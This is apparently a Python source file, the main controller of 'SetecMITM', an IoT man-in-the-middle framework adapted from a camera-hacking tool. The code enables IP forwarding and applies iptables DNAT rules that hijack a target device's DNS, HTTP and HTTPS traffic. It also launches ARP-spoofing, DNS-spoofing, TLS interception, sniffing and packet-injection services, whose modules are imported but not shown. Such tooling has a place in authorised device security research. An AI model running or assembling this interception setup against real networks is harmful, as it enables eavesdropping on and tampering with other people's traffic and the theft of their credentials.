Templated from cam-mitm. The camera-specific code (UBox cloud client, CVE verifiers, OAM HMAC signing, fuzzer wordlists) is removed; what's left is the generic core: ARP spoof, DNS spoof, HTTP/HTTPS interception with peek-before-wrap, raw sniffer with conntrack-based original-dst lookup, protocol fingerprinting, intruder detection, packet injection, log rotation, PyQt6 GUI on top of a service Controller. All 'camera' references renamed to 'target' throughout. Configuration moved into ~/.config/setec-mitm/config.json with the Settings tab as the primary editor. Plugin system at targets/<name>/plugin.py for vendor-specific code. See README.md for full setup, plugin authoring, and troubleshooting. Co-authored by Setec Labs.
224 lines
8.1 KiB
Python
Executable File
224 lines
8.1 KiB
Python
Executable File
#!/usr/bin/env python3
|
|
"""
|
|
SetecMITM — generic IoT / cloud-device MITM framework.
|
|
|
|
Drop-in framework for ARP spoofing, DNS hijacking, HTTP/HTTPS interception,
|
|
UDP capture, raw sniffer, intruder detection, and packet injection against
|
|
any device on the LAN. Target-specific logic (vendor cloud clients, CVE
|
|
verifiers, fuzzer wordlists) lives in `targets/<name>/` plugins.
|
|
|
|
Run with:
|
|
sudo /usr/bin/python3 mitm.py
|
|
or via the PyQt6 GUI:
|
|
sudo /usr/bin/python3 gui.py
|
|
"""
|
|
|
|
import os
|
|
import sys
|
|
import signal
|
|
import threading
|
|
import time
|
|
|
|
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
|
|
|
from config import Config
|
|
from utils.log import (
|
|
log, log_lines, init_logfile, close_logfile, lock,
|
|
C_NONE, C_ERROR, C_SUCCESS, C_INFO, C_TRAFFIC, C_IMPORTANT,
|
|
)
|
|
from services import (
|
|
arp_spoof, dns_spoof, http_server, udp_listener, sniffer, intruder_watch,
|
|
)
|
|
from inject import packet
|
|
|
|
|
|
SERVICE_DEFS = [
|
|
# (name, runner_factory)
|
|
("arp", lambda cfg, flags, ck: arp_spoof.run(cfg, flags, ck)),
|
|
("dns", lambda cfg, flags, ck: dns_spoof.run(cfg, flags, ck)),
|
|
("http", lambda cfg, flags, ck: http_server.run_http(cfg, flags, ck)),
|
|
("https", lambda cfg, flags, ck: http_server.run_https(cfg, flags, ck)),
|
|
("sniffer", lambda cfg, flags, ck: sniffer.run(cfg, flags, ck)),
|
|
("intruder", lambda cfg, flags, ck: intruder_watch.run(cfg, flags, ck)),
|
|
]
|
|
SERVICE_NAMES = [s[0] for s in SERVICE_DEFS]
|
|
SERVICE_BY_NAME = {s[0]: s for s in SERVICE_DEFS}
|
|
|
|
|
|
class Controller:
|
|
"""
|
|
Service supervisor. Owns the iptables redirect rules, per-service
|
|
on/off state, and the loaded target plugin (if any).
|
|
"""
|
|
|
|
def __init__(self):
|
|
self.cfg = Config()
|
|
self.flags = {}
|
|
self.running = True
|
|
self.services_running = False
|
|
self._svc_running = {n: False for n in SERVICE_NAMES}
|
|
self._iptables_up = False
|
|
self.plugin = None
|
|
self._load_plugin()
|
|
|
|
# ─── plugin loader ────────────────────────────────────
|
|
def _load_plugin(self):
|
|
name = self.cfg.get("target_plugin", "")
|
|
if not name:
|
|
return
|
|
try:
|
|
mod = __import__(f"targets.{name}.plugin", fromlist=["Plugin"])
|
|
self.plugin = mod.Plugin(self.cfg)
|
|
log(f"plugin loaded: {name}", C_SUCCESS)
|
|
except Exception as e:
|
|
log(f"plugin load failed ({name}): {e}", C_ERROR)
|
|
|
|
# ─── iptables ─────────────────────────────────────────
|
|
def _ensure_iptables(self):
|
|
if self._iptables_up:
|
|
return
|
|
if not self.cfg["target_ip"] or not self.cfg["our_ip"]:
|
|
log("iptables: target_ip and our_ip must be set", C_ERROR)
|
|
return
|
|
os.system("pkill -f arpspoof 2>/dev/null")
|
|
os.makedirs(self.cfg["log_dir"], exist_ok=True)
|
|
self._setup_iptables()
|
|
self._iptables_up = True
|
|
|
|
def _setup_iptables(self):
|
|
tgt = self.cfg["target_ip"]
|
|
us = self.cfg["our_ip"]
|
|
cmds = [
|
|
"sysctl -w net.ipv4.ip_forward=1",
|
|
"iptables -A OUTPUT -p icmp --icmp-type redirect -j DROP",
|
|
f"iptables -t nat -A PREROUTING -s {tgt} -p udp --dport 53 -j DNAT --to-destination {us}:53",
|
|
f"iptables -t nat -A PREROUTING -s {tgt} -p tcp --dport 80 -j DNAT --to-destination {us}:80",
|
|
f"iptables -t nat -A PREROUTING -s {tgt} -p tcp --dport 443 -j DNAT --to-destination {us}:443",
|
|
]
|
|
for c in cmds:
|
|
os.system(c + " >/dev/null 2>&1")
|
|
log("iptables rules applied", C_INFO)
|
|
|
|
def _cleanup_iptables(self):
|
|
tgt = self.cfg["target_ip"]
|
|
us = self.cfg["our_ip"]
|
|
cmds = [
|
|
"iptables -D OUTPUT -p icmp --icmp-type redirect -j DROP",
|
|
f"iptables -t nat -D PREROUTING -s {tgt} -p udp --dport 53 -j DNAT --to-destination {us}:53",
|
|
f"iptables -t nat -D PREROUTING -s {tgt} -p tcp --dport 80 -j DNAT --to-destination {us}:80",
|
|
f"iptables -t nat -D PREROUTING -s {tgt} -p tcp --dport 443 -j DNAT --to-destination {us}:443",
|
|
]
|
|
for c in cmds:
|
|
os.system(c + " >/dev/null 2>&1")
|
|
|
|
# ─── per-service control ──────────────────────────────
|
|
def start_service(self, name):
|
|
if name not in SERVICE_BY_NAME:
|
|
log(f"unknown service: {name}", C_ERROR)
|
|
return
|
|
if self._svc_running.get(name):
|
|
log(f"{name} already running", C_ERROR)
|
|
return
|
|
self._ensure_iptables()
|
|
if name == "http": os.system("fuser -k 80/tcp 2>/dev/null")
|
|
elif name == "https": os.system("fuser -k 443/tcp 2>/dev/null")
|
|
elif name == "dns": os.system("fuser -k 53/udp 2>/dev/null")
|
|
time.sleep(0.2)
|
|
|
|
self._svc_running[name] = True
|
|
check = lambda n=name: self.running and self._svc_running.get(n, False)
|
|
runner = SERVICE_BY_NAME[name][1]
|
|
threading.Thread(
|
|
target=lambda: runner(self.cfg, self.flags, check),
|
|
daemon=True, name=f"svc-{name}",
|
|
).start()
|
|
self.services_running = any(self._svc_running.values())
|
|
log(f"started: {name}", C_SUCCESS)
|
|
|
|
def stop_service(self, name):
|
|
if not self._svc_running.get(name):
|
|
log(f"{name} not running", C_ERROR)
|
|
return
|
|
self._svc_running[name] = False
|
|
log(f"stopping: {name}…", C_INFO)
|
|
if name == "http": os.system("fuser -k 80/tcp 2>/dev/null")
|
|
elif name == "https": os.system("fuser -k 443/tcp 2>/dev/null")
|
|
elif name == "dns": os.system("fuser -k 53/udp 2>/dev/null")
|
|
time.sleep(0.5)
|
|
self.flags[name] = False
|
|
self.services_running = any(self._svc_running.values())
|
|
|
|
def toggle_service(self, name):
|
|
if self._svc_running.get(name):
|
|
self.stop_service(name)
|
|
else:
|
|
self.start_service(name)
|
|
|
|
def start_services(self):
|
|
if self.services_running:
|
|
log("services already running", C_ERROR)
|
|
return
|
|
self._ensure_iptables()
|
|
# Honour auto_* config flags
|
|
for name in SERVICE_NAMES:
|
|
key = f"auto_{name}"
|
|
if self.cfg.get(key, True):
|
|
self.start_service(name)
|
|
time.sleep(0.3)
|
|
# Optional UDP listeners
|
|
for port in self.cfg.get("auto_udp_ports", []) or []:
|
|
threading.Thread(
|
|
target=lambda p=port: udp_listener.run(p, self.cfg, self.flags,
|
|
lambda: self.running and self.services_running),
|
|
daemon=True, name=f"svc-udp{port}",
|
|
).start()
|
|
time.sleep(0.2)
|
|
log("all services started", C_SUCCESS)
|
|
|
|
def stop_services(self):
|
|
if not self.services_running:
|
|
log("services not running", C_ERROR)
|
|
return
|
|
log("stopping all services…", C_INFO)
|
|
for name in SERVICE_NAMES:
|
|
if self._svc_running.get(name):
|
|
self.stop_service(name)
|
|
time.sleep(1)
|
|
self._cleanup_iptables()
|
|
self._iptables_up = False
|
|
self.flags.clear()
|
|
self.services_running = False
|
|
log("services stopped", C_INFO)
|
|
|
|
def inject_packet(self, params):
|
|
return packet.inject(self.cfg, params)
|
|
|
|
|
|
def main():
|
|
if os.geteuid() != 0:
|
|
print("Run with: sudo /usr/bin/python3 mitm.py")
|
|
sys.exit(1)
|
|
ctrl = Controller()
|
|
init_logfile(f"{ctrl.cfg['log_dir']}/setec_mitm.log")
|
|
|
|
# Headless mode — start everything and wait. The full curses TUI from
|
|
# cam-mitm is not bundled here; use gui.py instead.
|
|
log("setec-mitm headless mode. Use gui.py for the full UI.", C_INFO)
|
|
ctrl.start_services()
|
|
|
|
def shutdown(*_):
|
|
log("shutting down…", C_INFO)
|
|
ctrl.stop_services()
|
|
ctrl.running = False
|
|
close_logfile()
|
|
sys.exit(0)
|
|
|
|
signal.signal(signal.SIGINT, shutdown)
|
|
signal.signal(signal.SIGTERM, shutdown)
|
|
while ctrl.running:
|
|
time.sleep(0.5)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|